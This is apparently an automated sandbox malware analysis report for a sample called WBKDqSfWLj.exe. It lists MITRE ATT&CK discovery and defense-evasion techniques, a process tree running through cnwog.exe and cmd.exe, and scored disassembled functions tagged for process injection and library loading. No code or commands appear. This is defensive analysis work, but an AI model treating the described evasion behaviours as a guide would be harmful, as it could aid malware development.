Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report WBKDqSfWLj.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Spreading:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

IRP Handler

New Device

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WBKDqSfWLj.exe PID: 1628 Parent PID: 2260

General

Chronological Activities

Analysis Process: cnwog.exe PID: 1840 Parent PID: 1628

General

Chronological Activities

Analysis Process: cmd.exe PID: 2920 Parent PID: 1840

General

Chronological Activities

Analysis Process: WudfPf.sys PID: 4 Parent PID: -1

Function 00DB2604, Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 166
memorylibraryloaderCOMMON

Function 00DB29C6, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 106
COMMON

Function 00DB1903, Relevance: 6.1, APIs: 4, Instructions: 98
libraryloaderCOMMON

Function 00DB13D0, Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Function 00DB289C, Relevance: 24.1, APIs: 16, Instructions: 104
memoryCOMMON

Function 00401278, Relevance: 13.5, APIs: 8, Instructions: 1526
filememorystringCOMMON

Function 00DB2291, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30
synchronizationCOMMON

Function 00DB1434, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

Function 00DB1A94, Relevance: 5.1, APIs: 4, Instructions: 130
memoryCOMMON

Function 00DB17BF, Relevance: 3.1, APIs: 2, Instructions: 71
memoryCOMMON

Function 00DB171C, Relevance: 2.6, APIs: 2, Instructions: 67
memoryCOMMON

Function 00DB22DC, Relevance: 2.5, APIs: 2, Instructions: 18
COMMON

Function 0040101D, Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Function 00DB14F3, Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Function 00DB1C33, Relevance: 13.6, APIs: 9, Instructions: 66
threadprocessinjectionCOMMON

Function 00DB259B, Relevance: 3.0, APIs: 2, Instructions: 18
fileCOMMON

Function 00DB3E80, Relevance: .0, Instructions: 2
COMMON

Function 00DB3143, Relevance: 61.5, APIs: 30, Strings: 5, Instructions: 279
fileclipboardregistryCOMMON

Function 00DB2BDC, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 209
filelibraryloaderCOMMON

Function 00DB1E99, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 95
COMMON

Function 00DB1CDA, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 140
sleepCOMMON

Function 00DB2308, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 126
COMMON

Function 00DB2F02, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 106
libraryloaderfileCOMMON

Function 00DB2AF9, Relevance: 16.6, APIs: 11, Instructions: 93
processmemorysynchronizationCOMMON

Function 00DB21ED, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
stringprocessCOMMON

Function 00DB250C, Relevance: 12.1, APIs: 8, Instructions: 57
filememoryCOMMON

Function 00DB2822, Relevance: 9.0, APIs: 6, Instructions: 41
processCOMMON

Function 00DB24AA, Relevance: 9.0, APIs: 6, Instructions: 40
fileCOMMON

Function 00DB2062, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Function 00DB2088, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Function 00DB203C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Function 00D32604, Relevance: 47.4, APIs: 25, Strings: 2, Instructions: 166
memorylibraryloaderCOMMON

Function 00D329C6, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 106
COMMON

Function 00D3289C, Relevance: 24.1, APIs: 16, Instructions: 104
memoryCOMMON

Function 00D321ED, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
stringprocessCOMMON